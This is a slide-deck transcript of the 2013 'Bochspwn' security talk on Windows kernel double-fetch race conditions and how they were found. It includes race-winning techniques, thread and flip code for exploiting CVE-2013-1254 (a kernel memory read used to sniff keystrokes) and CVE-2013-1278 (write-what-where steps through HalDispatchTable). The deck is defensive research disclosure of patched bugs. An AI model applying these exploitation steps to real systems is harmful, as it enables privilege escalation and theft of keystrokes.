bochspwn: exploiting kernel race conditions found via memory
TRANSCRIPT
Bochspwn: Exploiting Kernel Race
Conditions Found via Memory Access
Patterns
Mateusz "j00ru" Jurczyk, Gynvael Coldwind
SyScan 2013
Singapore
Introduction
Who
• Mateusz Jurczyk
o Information Security Engineer @ Google
o Fanboy of Windows kernel internals
o http://j00ru.vexillium.org/
o @j00ru
• Gynvael Coldwind
o Information Security Engineer @ Google
o Likes hamburgers
o http://gynvael.coldwind.pl/
o @gynvael
What
• Understanding Windows kernel races
o specifically those in user/kernel interactions
• Identifying races
o The Bochspwn project
• Exploiting races
• Case study
• Final remarks
Why
• Local Windows security matters.
o see Chrome sandbox bypass at pwn2own 2013 [1]
• Buffer overflows are relatively well audited for.
o race conditions are not.
• Tons of them in Windows
o ~50 fixed after direct reports to Microsoft (thus far)
o between 10-20 fixed as variants
• Often trivially exploitable
WAT IZ DAT DOUBLE FETCH?
Basics of double fetch
Double fetch in kernel / drivers
1. Attacker invokes a syscall.
2. Syscall handler fetches a value for the first time to verify
it, or establish relations between kernel objects.
3. Attacker in a different thread switches the number to be
really really evil.
4. Syscall handler fetches the parameter a second time to
use it.
Basics of double fetch (name)
Proper name:
time-of-check-to-time-of-use race condition. Way too long.
Fermin used a shorter name [2]:
Double-fetch.
(In some cases there are more than two fetches, but let's
settle for double anyway.)
Basics of double fetch (by example)
An exemplary bug in a syscall handler
PDWORD BufferSize = /* controlled user-mode address */;
PBYTE BufferPtr = /* controlled user-mode address */;
PBYTE LocalBuffer;
LocalBuffer = ExAllocatePool(PagedPool, *BufferSize);
if (LocalBuffer != NULL) {
RtlCopyMemory(LocalBuffer, BufferPtr, *BufferSize);
} else {
// bail out
}
Basics of double fetch (by example)
mov edx, dword ptr [ebp-BufferSize]
push PagedPool
push [edx]
call ExAllocatePool
mov edx, dword ptr [ebp-BufferSize]
push [edx]
push dword ptr [ebp-BufferPtr]
push eax
call RtlCopyMemory
xor dword ptr [BufferSize], 0x80000000
CPU 2 (kernel-mode) CPU 1 (user-mode)
BufferSize = 0x00001000
BufferSize = 0x80001000
A user-mode thread winning a race
against a kernel-mode code double
fetching a parameter from user-
controlled memory.
Basics of double fetch (by example)
• The raced value was a buffer size.
• Result: kernel pool-based buffer overflow
o Exploitable EoP condition.
• The same can happen with pointers or any
other data type.
The story
How it all started
• 2008: While looking at win32k.sys, j00ru found this:
.text:BF8C3120 mov eax, _W32UserProbeAddress
[...]
.text:BF8C3154 cmp [ecx+8], eax
.text:BF8C3157 jnb short loc_BF8C315C
.text:BF8C3159 mov eax, [ecx+8]
• ECX is a user-mode memory address.
• [ECX+8] is the address being validated
o later used in a "read" operation
Back in
2008
How it all started
• The code basically translated to
if (UserStructure->UserPtr >= MmUserProbeAddress) {
// Exit }
// Read from UserStructure->UserPtr
• Clearly, there was a race condition there!
o Not a priv-escal one.
o But perhaps an information disclosure?
• Noticed it, but didn't follow at that time.
Back in
2008
How it all started
• Returned to the subject when rediscovered it a few
months ago.
• Construct is specific to an internal Windows kernel
mechanism called user-mode callbacks
o nt!KeUserModeCallback, already caused a lot of trouble
o ~40 related bugs found by Tarjei [4]
Fast forward to 2012
How it all started
• There are many instances of this bug all around win32k.sys
o We found a total of 27.
• Turns out they are all exploitable!
o You can read data from arbitrary kernel addresses within a user-
mode application
… if you can hit the right timing in the race condition, of course ☺
Fast forward to 2012
Vulnerable routines (already fixed)
Fast forward to 2012
win32k!xxxClientGetCharsetInfo
win32k!ClientImmLoadLayout
win32k!CalcOutputStringSize
win32k!CopyOutputString
win32k!fnHkINDWORD
win32k!SfnINOUTLPWINDOWPOS
win32k!SfnINOUTLPPOINT5
win32k!ClientGetMessageMPH
win32k!SfnINOUTSTYLECHANGE
win32k!ClientGetListboxString
win32k!SfnOUTLPRECT
win32k!xxxClientCopyDDEOut1
win32k!xxxClientCopyDDEIn1
win32k!fnHkINLPCBTCREATESTRUCT
win32k!SfnINOUTLPMEASUREITEMSTRUCT
win32k!SfnOUTLPCOMBOBOXINFO
win32k!SfnOUTLPSCROLLBARINFO
win32k!SfnINOUTLPSCROLLINFO
win32k!SfnINOUTLPUAHMEASUREMENUITEM
win32k!fnHkINLPMOUSEHOOKSTRUCTEX
win32k!SfnOUTLPTITLEBARINFOEX
win32k!SfnINOUTLPRECT
win32k!SfnINOUTDRAG
win32k!SfnINOUTNEXTMENU
win32k!fnHkINLPRECT
win32k!fnHkOPTINLPEVENTMSG
win32k!xxxClientGetDDEHookData
Are there more?
And how to find them?
How about...
Memory Access Pattern Analysis?
A double fetch bug can be described as an event that
meets the following criteria:
• a linear memory access...
• ... initiated from ring-0 ...
• ... referencing memory writable from ring-3 ...
• ... twice (or more) ...
• ... in the same semantic context.
It's a memory access pattern, essentially!
Enter the bochspwn
• Bochspwn is an instrumentation module for Bochs for
memory access pattern analysis.
• It works like this:
o Start an OS (on Bochs + bochspwn)
o Let it start (it's slow - more on next two slides)
o Run anything that might invoke syscalls
o Shutdown the system
o Filter the outcome log
o ... and get a lot of potential double-fetch bugs!
For more information, refer to the whitepaper.
The tool itself will be released later this year.
Yep, it was slow.
Actual speed:
1-20M instructions per second
Stats: bochspwn vs Windows
• 89 potential new issues discovered
o + part of the initial 27 bugs were also rediscovered
o All were reported to Microsoft (Nov 2012 - Jan 2013)
• 36 EoPs (+3 variants) addressed by: MS13-016,
MS13-017, MS13-031, MS13-036
• 13 issues have been classified as Local DoS only
• 7 more are being analyzed / are scheduled to be fixed
• The rest were unexploitable / non-issues / etc
Tested: Windows 7 32-bit, Windows 8 32-bit and Windows 8 64-bit.
Exploitation
Define the goal
Maximize the "WPS" (wins per second) rate.
The resulting violations are not discussed here: exploitation of buffer
overflows and write-what-where conditions is a separate study.
Define the means
• Extend the attack time window
o the problem of slowing down a portion of a kernel-mode code.
• Use optimal thread assignment
o how many and which (trigger vs. flip) threads on which CPU.
• Use optimal "flip" operation
o xor vs inc or add.
• Other tricks (e.g. process priority classes)
The techniques
Attack window extension methods are by far
most interesting.
Page boundaries
mov eax, [ecx]
• ECX is a controlled user-mode pointer.
o points to cached memory, for simplicity.
• How to slow this down?
Page boundaries
• Place [ECX] across two adjacent pages.
o Twice as many virtual address translations.
o Twice as many requests to cache.
o Additional cycles to concatenate values and so forth.
• Performance impact
o ~1.85 cycles (aligned) vs ~4.23 cycles (across cache line) vs
~25.09 cycles (across virtual pages)
o More than 5x of execution time increase for free!
Page boundaries
Test configuration: Intel i7-3930K @ 3.20GHz, DDR3 RAM CL9 @ 1333
MHz
Page boundaries
Is that all? Nope.
Can page boundaries help with the following?
cmp [ecx+8], eax
jnb bail_out
mov eax, [ecx+8]
Page boundaries
They can!
Imagine the following scenario:
page boundary
byte flipped by a racing thread
32-bit dword
fetched by
win32k.sys twice.
F0 12 40 00
Page boundaries
cmp [ecx+8], eax
jnb bail_out
mov eax, [ecx+8]
1. Virtual address translation of ecx+8.
2. Fetching data of ecx+8 from cache.
4. Virtual address translation of ecx+8.
5. Fetching data of ecx+8 from cache.
3. Implementation of conditional branch.
Aligned access
time window
Page boundaries
cmp [ecx+8], eax
jnb bail_out
mov eax, [ecx+8]
1. Virtual address translation of ecx+8. 2. Fetching data of ecx+8 from cache. 3. Virtual address translation of ecx+b. 4. Fetching data of ecx+b from cache.
6. Virtual address translation of ecx+8. 7. Fetching data of ecx+8 from cache. 8. Virtual address translation of ecx+b. 9. Fetching data of ecx+b from cache.
5. Implementation of conditional branch.
Boundary access ((ecx + 8) & fff = ffd)
time window
Disabling page cacheability
Let's stick to slowing down
mov eax, [ecx]
• Cached reads are the fastest ones available.
o We want the opposite.
• Cacheability can be disabled for chosen pages
o PAGE_NOCACHE in Memory API.
o PAGE_WRITECOMBINE also disables caching (for
different reasons).
Disabling page cacheability
• Fetches from RAM are much more expensive.
• Especially so, if we use misaligned addresses
o Virtual page boundaries no longer matter.
o RAM boundaries come into play.
much smaller: 8 to 64 bytes in width.
At this point, we can push a controlled memory
reference to take up to ~500 cycles.
Can we go further?
TLB Flushing
• It's difficult to further slow down the data-fetching
process.
o continuously swapping out to disk is not effective.
• This leaves us with virtual address translation.
o Page Table memory reads are expensive.
o Translation Lookaside Buffers (TLB) are used to cache
virtual/physical address associations.
o TLBs can be flushed (INVLPG instruction)
thread context switches (preemption or SwitchToThread)
working set API (VirtualUnlock or EmptyWorkingSet)
TLB Flushing
• On a TLB miss, CPU performs a page walk
o Introduces three or four extra reads from RAM
influenced by PAE
varies between x86 and x86-64
o Further extends the completion time of an instruction
by thousands of cycles.
TLB Flushing
TLB Flushing
• First reference to memory a region is extended to over
2,500 cycles.
o All further accesses use cached TLB entries.
• Flushing the translation cache costs time
o EmptyWorkingSet takes ~81,000 cycles on test machine.
o VirtualUnlock takes ~900, has the same outcome.
This is less than the overhead it adds!
Practically always cost effective.
• Useful when there are user-mode memory reads inside
of the attack window.
Thread assignment
• Soo... we extended the attack window from 10 to
10,000 cycles... what now?
• Given n CPUs, how to use them most effectively?
o assume n ≥ 2
• Presence of Hyper-Threading changes things
dramatically, let's consider both cases separately.
Thread assignment: approach
• Test scenario: six cores (Intel i7-3930K CPU as usual)
• We tested seven different assignment strategies
o Chosen arbitrarily based on gut feeling
o Each examined against a cached / non-cached memory region
• Used a custom user-mode app counting race wins against:
void run_race(uint32_t *addr) {
__asm("mov ecx, %0" : "=m"(addr));
__asm("@@:");
__asm("mov eax, [ecx]");
__asm("mov edx, [ecx]");
__asm("cmp eax, edx");
__asm("jz @@");
}
Thread assignment with HT
• CPU #0 and #1, #2 and #3, #4 and #5 on the same
physical chip.
Thread assignment without HT
• All cores physically separate.
Thread assignment: conclusions
• Regardless of Hyper-Threading, it is best to create n/2
pairs of (trigger, flip) threads, each pair targeting
different memory area.
o 1 thread per 1 cpu: no unnecessary context switches.
o 1 region per pair: no unnecessary memory locks.
• With HT enabled, choose cacheable regions.
o L1/2 caches are shared between both logical CPUs.
o Faster access means more wins per second.
• With HT disabled, choose non-cacheable regions.
Flipping bytes
• Flipping thread code should be typically as simple as:
xor [eax], 0x8000
jmp $-4
• Either a binary (xor) or arithmetic (sub, add, mul) operation
can be used for the flipping.
XOR
0000 → 8000 → 0000 → 8000 → 0000 → 8000 → 0000
ADD
0000 → 0001 → 0002 → 0003 → 0004 → 0005 → 0006
Flipping bytes - comparison
XOR • Precise...
o always 2 variable states
(the good and the bad)
• ... but slow
o odd number of flips
required within the
window
o otherwise the value
doesn't change
ADD • Less precise
o many variable states
o you never know how the
value changed between
the two fetches
• Fast
o Any number of flips is
good.
o 2 times more effective
than XOR
Flipping bytes - comparison
XOR • Bugs with binary decision
o e.g. pointers
__try {
ProbeForWrite(*UserPtr,
sizeof(STRUCTURE),
1);
(*UserPtr)->Field = 0;
} except {
return GetExceptionCode();
}
ADD • Bugs with relative relations
o e.g. dynamic allocations
Object = ExAllocatePool(PagedPool,
*UserPtr);
if (Object != NULL) {
RtlCopyMemory(Object,
UserPtr,
*UserPtr);
}
Other tips & tricks
• Certain scenarios require further tricks
o single-cpu configurations are significantly more difficult to
exploit
rarely used
o prioritization of attacker's threads over other threads in a
shared system
thread / process priority classes
o ...
• Insufficient time :(
• Be sure to check the whitepaper!
Case study
CVE-2013-1254 (remainder)
.text:BF8C3120 mov eax, _W32UserProbeAddress
[...]
.text:BF8C3154 cmp [ecx+8], eax
.text:BF8C3157 jnb short loc_BF8C315C
.text:BF8C3159 mov eax, [ecx+8]
A whole group of issues (27 in
total)
CVE-2013-1254 (remainder)
typedef struct _CALLBACK_OUTPUT {
/* +0x00 */ NTSTATUS st;
/* +0x04 */ DWORD cbOutput;
/* +0x08 */ PVOID pOutput;
} CALLBACK_OUTPUT, *PCALLBACK_OUTPUT;
CVE-2013-1254
• Construct responsible for fetching output data of a user-
mode callback (nt!KeUserModeCallback)
• What happens next (for example):
.text:BF8BC4A8 push 7
.text:BF8BC4AA pop ecx
.text:BF8BC4AB mov esi, eax
.text:BF8BC4AD rep movsd
• The twice-fetched pointer is used as "src" in an inlined
memcpy() copying into local buffer.
CVE-2013-1254
The potentially arbitrary value is always used as a read operand, never used for write.
Bad news: no kernel-space memory corruption.
So what's left?
CVE-2013-1254
Many things, in fact.
However, let's first win the race.
CVE-2013-1254
• Let's settle on win32k!SfnINOUTSTYLECHANGE
o triggered by SetWindowLong(hwnd, GWL_STYLE, 0)
• To control ECX (the PCALLBACK_OUTPUT), user-mode
callbacks must be hijacked and re-implemented.
o Trivial, pointer to callback table found in
PEB->KernelCallbackTable
CVE-2013-1254
0: kd> dps poi($peb+2c) poi($peb+2c)+1a0
757ad568 757964eb USER32!__fnCOPYDATA
[...]
757ad600 757df12b USER32!__fnSENTDDEMSG
757ad604 757a4a4f USER32!__fnINOUTSTYLECHANGE
757ad608 7579e20b USER32!__fnHkINDWORD
[...]
• We could hook __fnINOUTSTYLECHANGE specifically
o API indexes change between versions.
o Other callbacks are not relevant, anyway.
• Let's instead hook the whole table.
CVE-2013-1254
VOID CallbackHandler(PVOID lpParameter) {
NtCallbackReturn(&address[-8],
sizeof(CALLBACK_OUTPUT),
ERROR_SUCCESS);
}
A generic implementation of hijacked user-mode callback
handler.
CVE-2013-1254
DWORD RacingThread(HWND hwnd) { while (1) { SetWindowLong(hwnd, GWL_STYLE, 0); } return 0; } DWORD FlippingThread(LPDWORD address) { while (1) { *address ^= 0x80000000; } return 0; }
Trivial racing and flipping
threads.
CVE-2013-1254
TRAP_FRAME: 8fa3fac0 -- (.trap 0xffffffff8fa3fac0)
ErrCode = 00000000
eax=800053fc ebx=00000002 ecx=002efff6 edx=00000000 esi=fffffffe edi=7ffde700
eip=922f3229 esp=8fa3fb34 ebp=8fa3fba4 iopl=0 nv up ei ng nz na pe cy
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010287
win32k!SfnINOUTSTYLECHANGE+0x14d:
922f3229 8b08 mov ecx,dword ptr [eax] ds:0023:800053fc=????????
Resetting default scope
LAST_CONTROL_TRANSFER: from 828ecffb to 82888840
Result
CVE-2013-1254
• How to maximize wins per second?
o Windows 7 SP1 32-bit, VirtualBox 4.2.12 (4 core) @ Intel Xeon
W3690 CPU @ 3.46GHz, Hyper-Threading disabled.
• Previous techniques
o two (flip, race) pairs of threads, each on separate CPU
o DWORD on page boundary
o non-cacheable memory region
o TLB flushing
o xor used for flipping
o priority classes set to HIGH_PRIORITY_CLASS,
THREAD_PRIORITY_HIGHEST
CVE-2013-1254
• Memory access right variations
o For non-HT attacks with page boundaries, it makes sense to to
use PAGE_NOCACHE only for the first page.
still extends time window, doesn't slow down the flipping thread.
PAGE_RWX | PAGE_NOCACHE PAGE_RWX
page boundary
raced dword
flipped word
CVE-2013-1254
By using the techniques, we achieved ~30 race wins per
second.
(Your Mileage May Vary)
CVE-2013-1254
• The data from arbitrary location can be fetched back.
o GetWindowLong(hwnd, GWL_STYLE)
• Classic read-4 condition.
• So, we can read ~130 bytes of ring-0 memory every
second. what now?
CVE-2013-1254
Options
• Defeat Kernel ASLR... meh :/
• Defeat GS stack cookies (chained with stack overrun)
• Disclose disk encryption secrets (e.g. TrueCrypt key)
• Disclose pool garbage
o nt, win32k.sys, tcpip.sys, ntfs.sys sensitive data
• Disclose NTLM hashes from registry
o cached HKLM\SAM\SAM\Domains\Account\Users\?\V entries
• Sniff on peripherals (e.g. a PS/2 keyboard).
CVE-2013-1254
Let's sniff the keyboard.
CVE-2013-1254
• PS/2 devices (keyboard, mouse) each have an IDT
entry
o both interrupts handled by i8042prt.sys
kd> !idt
Dumping IDT:
...
61: 85a4d558 i8042prt!I8042MouseInterruptService (KINTERRUPT 85a4d500)
71: 85a4d7d8 i8042prt!I8042KeyboardInterruptService (KINTERRUPT 85a4d780)
• KINTERRUPT pointer is encoded in each IDT_ENTRY
kd> ? (poi(idtr + (61 * 8) + 4) & 0xffff0000) |
(poi(idtr + (61 * 8) + 0) & 0x0000ffff)
Evaluate expression: -2052795048 = 85a4d558
CVE-2013-1254
• i8042prt.sys descriptors can be identified via
KINTERRUPT.ServiceRoutine
o The two closest to i8042prt.sys image base.
o Base determined with EnumDeviceDrivers,
GetDeviceDriverBaseName
• Mouse / keyboard can be further distinguished with
KINTERRUPT.Irql and SynchronizeIrql
CVE-2013-1254
kd> dt _KINTERRUPT Irql SynchronizeIrql 85a4d500
nt!_KINTERRUPT
+0x030 Irql : 0x5 ’’
+0x031 SynchronizeIrql : 0x6 ’’
kd> dt _KINTERRUPT Irql SynchronizeIrql 85a4d780
nt!_KINTERRUPT
+0x030 Irql : 0x6 ’’
+0x031 SynchronizeIrql : 0x6 ’’
CVE-2013-1254
A quick look into I8042KeyboardInterruptService
.text:000174C3 mov eax, [ebp+pDeviceObject]
.text:000174C6 mov esi, [eax+DEVICE_OBJECT.DeviceExtension]
...
.text:00017581 lea eax, [ebp+scancode]
.text:00017584 push eax
.text:00017585 push 1
.text:00017587 call _I8xGetByteAsynchronous@8
.text:0001758C lea eax, [esi+14Ah]
.text:00017592 mov cl, [eax]
.text:00017594 mov [esi+14Bh], cl
.text:0001759A mov cl, byte ptr [ebp+scancode]
.text:0001759D mov [eax], cl
...
CVE-2013-1254
• The two most recent raw scancodes are always stored
at offsets 0x14a and 0x14b of the keyboard
DEVICE_EXTENSION.
o Device extension at offset 0x28 of Device object
o Device object at offset 0x18 of KINTERRUPT.
• The purpose is unclear
o we have never detected the fields to be read from.
• Makes exploitation trivial.
CVE-2013-1254
• Approximately 630 four-byte reads to reliably locate
keyboard IDT entry.
o ~20 seconds for 30 hits / second.
• The key sniffing resolution is 60 presses per second
o One DWORD read covers two scancodes.
o Should be enough for the fastest typists in the world.
• Scancode conversion
o MapVirtualKeyEx(MAPVK_VSC_TO_VK)
o MapVirtualKeyEx(MAPVK_VK_TO_CHAR)
CVE-2013-1254
EXPLOIT DEMO
CVE-2013-1278
• Since XP, Windows comes with a feature called
"Application Compatibility Database"
o or "Shim Engine"
o or "Apphelp" (short, internal name)
o described by Alex in a series of posts [3]
• Provides with ways to hook certain API classes, among
other things.
• Makes your Windows 98 SE applications work
flawlessly in Windows 8.
CVE-2013-1278
CVE-2013-1278
• Apphelp has cache
o Associates shimming information with executable file paths.
o In Windows XP, implemented by a shared section.
o In Vista and later, handled by NtApphelpCacheControl
o Fast way to look up shimming data for commonly executed
files.
• NtApphelpCacheControl supports several opcodes
ApphelpCacheLookupEntry, ApphelpCacheInsertEntry,
ApphelpCacheRemoveEntry, ApphelpCacheFlush,
ApphelpCacheDump, ApphelpCacheSetServiceStatus,
ApphelpCacheForward, ApphelpCacheQuery
CVE-2013-1278
Let's look into ApphelpCacheLookupEntry in Windows 7...
PAGE:00631EC4 mov ecx, [edi+18h]
...
PAGE:00631EE0 push 4
PAGE:00631EE2 push eax
PAGE:00631EE3 push ecx
PAGE:00631EE4 call _ProbeForWrite@12
PAGE:00631EE9 push dword ptr [esi+20h]
PAGE:00631EEC push dword ptr [esi+24h]
PAGE:00631EEF push dword ptr [edi+18h]
PAGE:00631EF2 call _memcpy
... same pattern in ApphelpCacheQuery
CVE-2013-1278
Translates to:
ProbeForWrite(*UserPtr, Length, Alignment);
memcpy(*UserPtr, Data, Length);
so, a write-where condition.
o one shot one kill
o easy accessible
o trivial to win the race
CVE-2013-1278
Required input structure
Offset Value
0x98 A handle to the executable file,
e.g. C:\Windows\system32\wuauclt.exe
0x9c UNICODE_STRING structure containing NT path of the file
0xa4 Size of the output buffer, e.g. 0xffffffff
0xa8 Pointer to the output buffer
subject to race
CVE-2013-1278
• Relatively large window makes it easy to get a hit.
o Dozens of separating instructions (mainly ProbeForWrite)
o Two simple threads on two cores are more than enough
One core would likely suffice
TRAP_FRAME: a8646bc8 -- (.trap 0xffffffffa8646bc8)
ErrCode = 00000002
eax=a5f34440 ebx=82951c00 ecx=00000072 edx=00000000 esi=a5f34278 edi=f0405100
eip=8284eef3 esp=a8646c3c ebp=a8646c44 iopl=0 nv up ei pl nz ac pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010216
nt!memcpy+0x33:
8284eef3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope
CVE-2013-1278
We've got the "where". What about the "what"?
8c974e38 00034782 00000000 00000000 00000000 00000000 00000000
8c974e50 00000000 00000000 00000000 00000000 00000000 00000000
8c974e68 00000000 00000000 00000000 00000000 00000000 00000000
8c974e80 00000000 00000000 00000000 00000000 00000000 00000000
8c974e98 00000000 00000000 00000000 00000000 00000000 00000000
8c974eb0 00000000 00000000 00000000 00000000 00000000 00000000
8c974ec8 00000000 00000000 00000000 00000000 00000000 00000000
8c974ee0 00000001 00000000 00000000 00000000 00000000 00000000
8c974ef8 00000000 00000001 11111111 11111111 11111111 11111111
8c974f10 00000000 00000000 00000000 00000000 00000000 00000000
8c974f28 00000000 00000000 00000000 00000000 00000000 00000000
8c974f40 00000000 00000000 00000000 00000000 00000000 00000000
8c974f58 00000000 00000000 00000000 00000000 00000000 00000000
8c974f70 00000000 00000000 00000000 00000000 00000000 00000000
8c974f88 00000000 00000000 00000000 00000000 00000000 00000000
8c974fa0 00000000 00000000 00000000 00000000 00000000 00000000
8c974fb8 00000000 00000000 00000000 00000000 00000000 00000000
8c974fd0 00000000 00000000 00000000 00000000 00000000 00000000
8c974fe8 00000000 00000000 00000000 00000000 00000000 00000000
CVE-2013-1278
• Large buffer, uninteresting contents
o mostly zeros
• Inserting new entries limited to SeTcbPrivilege
o proxied through the Application Experience service (see
apphelp.dll, aelupsvc.dll) in svchost.exe
3: kd> kb
ChildEBP RetAddr Args to Child
94389bb0 834584ea 94389bf4 80000ad4 94389bd4 nt!ApphelpCacheInsertEntry
94389c24 832838ba 00000002 030ef824 030ef8ec nt!NtApphelpCacheControl+0x118
...
030ef814 6fc41f5f 00000002 030ef824 00000000 ntdll!ZwApphelpCacheControl+0xc
030ef8ec 6fc4140b 0a2519d8 00001750 00000001 aelupsvc!AelpShimCacheUpdate+0x62
030ef990 6fc4150f 02e608e0 0f022a98 030ef9c4 aelupsvc!AelpProcessCacheExeMessage+0x297
030ef9a0 777b2671 030efa00 02e60a58 0f022a98 aelupsvc!AelTppWorkCallback+0x19
CVE-2013-1278
• Standard write-what-where vectors are impossible
o 0x1c8 bytes of static or pool memory damage is irrecoverable.
o No HalDispatchTable+4
o No reserve objects / KAPC structure
o ...
• How about... Private Namespace objects?
CVE-2013-1278
Private namespaces
• A security feature (sic!☺) introduced in Windows Vista.
o helps separate kernel object names (e.g. for different terminal
sessions)
• Required API
o CreatePrivateNamespace
o CreateBoundaryDescriptor
o ClosePrivateNamespace
• Built on top of a DIRECTORY kernel object.
CVE-2013-1278
Private namespaces - why awesome?
• Three advantages for exploitation
1. Controlled length
ObCreateObject(PreviousMode,
ObpDirectoryObjectType,
ObjectAttributes,
PreviousMode,
NULL,
UserControlled + 192,
NULL, NULL,
Object);
no overflow :(
CVE-2013-1278
Private namespaces - why awesome?
• Three advantages for exploitation
1. Controlled length
2. Mostly controlled contents
3. Linked into ObpPrivateNamespaceLookupTable with builtin
LIST_ENTRY.
CVE-2013-1278
Private namespaces - why awesome?
CVE-2013-1278
Unlinking is triggered via ClosePrivateNamespace.
In Windows ≤ 7, this grants an easy 4-write-what-
where.
CVE-2013-1278
ObpRemoveNamespaceFromTable (Windows
7)
PAGE:00674461 mov [esi+0A0h], ebx
PAGE:00674467 mov ecx, [eax]
PAGE:00674469 mov [eax+8], ebx
PAGE:0067446C mov eax, [eax+4]
PAGE:0067446F mov [eax], ecx
PAGE:00674471 mov [ecx+4], eax
LIST_ENTRY unlink pattern
CVE-2013-1278
ObpRemoveNamespaceFromTable (Windows
8)
PAGE:007360DA cmp [edx+4], eax
PAGE:007360DD jnz loc_7361BD
PAGE:007360E3 cmp [ecx], eax
PAGE:007360E5 jnz loc_7361BD
PAGE:007360EB mov [ecx], edx
PAGE:007360ED mov [edx+4], ecx
...
PAGE:007361BD push 3
PAGE:007361BF pop ecx
PAGE:007361C0 int 29h
CVE-2013-1278
• Exploitation steps
o Create private namespace
acquire address via SystemHandleInformation
o Overwrite LIST_ENTRY pointer with the 0x03?????? word.
random damage is taken by user-controlled unicode.
o Spray user-mode 0x03000000 - 0x03ffffff region with
LIST_ENTRY structures (write-what-where operands)
o Overwrite nt!HalDispatchTable+4 with a call to
NtClosePrivateNamespace.
o Run payload.
o Clean up (hal dispatch table, list entry in namespace)
CVE-2013-1278
CVE-2013-1278
EXPLOIT DEMO
Windows 8 memcmp double fetch
• Memory comparison functions in Windows kernel
o memcmp
o RtlCompareMemory
• Different semantics
o length of matching prefix vs relation between differing bytes
• Different implementations
o between versions of Windows (i.e. 7 vs 8)
o between bitnesses, x86 vs x86-64
Windows 8 memcmp double fetch
General scheme
1. Compare 32 / 64 bit chunks for as long as possible.
2. If any two differ, come back and compare at byte
granularity.
a. Return the result of the second run.
3. Compare the remaining 0 - 7 bytes, one by one.
4. Return result of the (3) comparison.
Windows 8 memcmp double fetch
General scheme
1. Compare 32 / 64 bit chunks for as long as possible.
2. If any two differ, come back and compare at byte
granularity.
a. Return the result of the second run.
3. Compare the remaining 0 - 7 bytes, one by one.
4. Return result of the (3) comparison.
Windows 8 memcmp double fetch
There is an evident double fetch
in
step 2.
... but does it really matter? (passing user-mode pointers to memcpy is insecure, anyway [5])
Windows 8 memcmp double fetch
Possibly, if we could fake a match
of two different streams.
Windows 8 memcmp double fetch
Usually doesn't matter (Windows 7/8 64-bit)
.text:0000000140072364 mov rcx, [rcx+rdx]
.text:0000000140072368 bswap rax
.text:000000014007236B bswap rcx
.text:000000014007236E cmp rax, rcx
.text:0000000140072371 sbb eax, eax
.text:0000000140072373 sbb eax, 0FFFFFFFFh
.text:0000000140072376 retn
translates to
return −(x ≤ y)
second
fetch
Windows 8 memcmp double fetch
Other implementations are similarly robust ...
... except for ...
... Windows 8 32-bit.
Windows 8 memcmp double fetch
1: if (*(PDWORD)ptr1 != *(PDWORD)ptr2) { 2: for (unsigned int i = 0; i < 4; i++) { 3: BYTE x = *(PBYTE)ptr1, y = *(PBYTE)ptr2; 4: if (x < y) { 5: return -1; 6: } else if (y < x) { 7: return 1; 8: } 9: } 10: return 0; 11: }
Windows 8 memcmp double fetch
Attack scenario (phase 1)
5
4
6
8
6
5
5
3
7
9
5
3
6
3
6
1
6
e
2
0
6
3
6
f
6
e
6
6
6
5
7
2
6
5
6
e
6
3
6
5 ptr1 →
0
0
0
0
0
0
0
0
2
c
6
e
3
d
6
f
0
0
1
2
6
5
7
2
0
0
5
8
6
e
6
5
2
0
0
0
6
f ptr2 →
2
0
7
2
6
f
7
8
7
8
5
4
6
8
6
5
f
f
2
0
2
0
Windows 8 memcmp double fetch
Attack scenario (phase 1)
5
4
6
8
6
5
2
0
7
9
5
3
6
1
6
e
2
0
6
3
6
f
6
e
6
6
6
5
7
2
6
5
6
e
6
3
6
5 ptr1 →
0
0
0
0
2
c
6
e
3
d
6
f
0
0
1
2
6
5
7
2
0
0
5
8
6
e
6
5
2
0
0
0
6
f ptr2 →
2
0
7
2
6
f
7
8
7
8
5
4
6
8
6
5
2
0
f
f
0
0
6
3
0
0
5
3
Windows 8 memcmp double fetch
Attack scenario (phase 1)
5
4
6
8
6
5
2
0
7
9
5
3
6
e
2
0
6
f
6
e
6
6
6
5
7
2
6
5
6
e
6
3
6
5 ptr1 →
0
0
0
0
6
e
6
f
0
0
1
2
6
5
7
2
0
0
5
8
6
e
6
5
2
0
0
0
6
f ptr2 →
2
0
7
2
6
f
7
8
7
8
5
4
6
8
6
5
2
0
f
f
0
0
6
3
0
0
5
3
6
3
3
d
6
1
2
c
Windows 8 memcmp double fetch
Attack scenario (phase 1)
5
4
6
8
6
5
2
0
7
9
5
3
6
e
2
0
6
f
6
e
6
6
6
5
7
2
6
5
6
e
6
3
6
5 ptr1 →
7
9
6
e
6
f
0
0
1
2
6
5
7
2
0
0
5
8
6
e
6
5
2
0
0
0
6
f ptr2 →
2
0
7
2
6
f
7
8
7
8
5
4
6
8
6
5
2
0
f
f
6
3
6
3
5
3
5
3
6
3
3
d
6
1
2
c
5
3
Windows 8 memcmp double fetch
Attack scenario (phase 2)
5
4
6
8
6
5
2
0
5
3
6
1
6
e
2
0
6
3
6
f
6
e
6
6
6
5
7
2
6
5
6
e
6
3
6
5 ptr1 →
5
3
2
c
6
e
3
d
6
f
0
0
1
2
6
5
7
2
0
0
5
8
6
e
6
5
2
0
0
0
6
f ptr2 →
2
0
7
2
6
f
7
8
7
8
5
4
6
8
6
5
2
0
f
f
6
3
6
3
7
9
7
9
5
3
5
3
Windows 8 memcmp double fetch
Attack scenario (phase 2)
5
4
6
8
6
5
2
0
5
3
6
1
6
e
2
0
6
3
6
f
6
e
6
6
6
5
7
2
6
5
6
e
6
3
6
5 ptr1 →
5
3
2
c
6
e
3
d
6
f
0
0
1
2
6
5
7
2
0
0
5
8
6
e
6
5
2
0
0
0
6
f ptr2 →
2
0
7
2
6
f
7
8
7
8
5
4
6
8
6
5
2
0
f
f
6
3
6
3
5
3
5
3
7
9
7
9
Windows 8 memcmp double fetch
Attack scenario (phase 2)
5
4
6
8
6
5
2
0
6
1
6
e
2
0
6
3
6
f
6
e
6
6
6
5
7
2
6
5
6
e
6
3
6
5 ptr1 →
2
c
6
e
3
d
6
f
0
0
1
2
6
5
7
2
0
0
5
8
6
e
6
5
2
0
0
0
6
f ptr2 →
2
0
7
2
6
f
7
8
7
8
5
4
6
8
6
5
2
0
f
f
6
3
6
3
7
9
7
9
5
3
5
3
5
3
5
3
Windows 8 memcmp double fetch
Attack scenario (phase 2)
5
4
6
8
6
5
2
0
5
3
6
1
6
e
2
0
6
3
6
f
6
e
6
6
6
5
7
2
6
5
6
e
6
3
6
5 ptr1 →
5
3
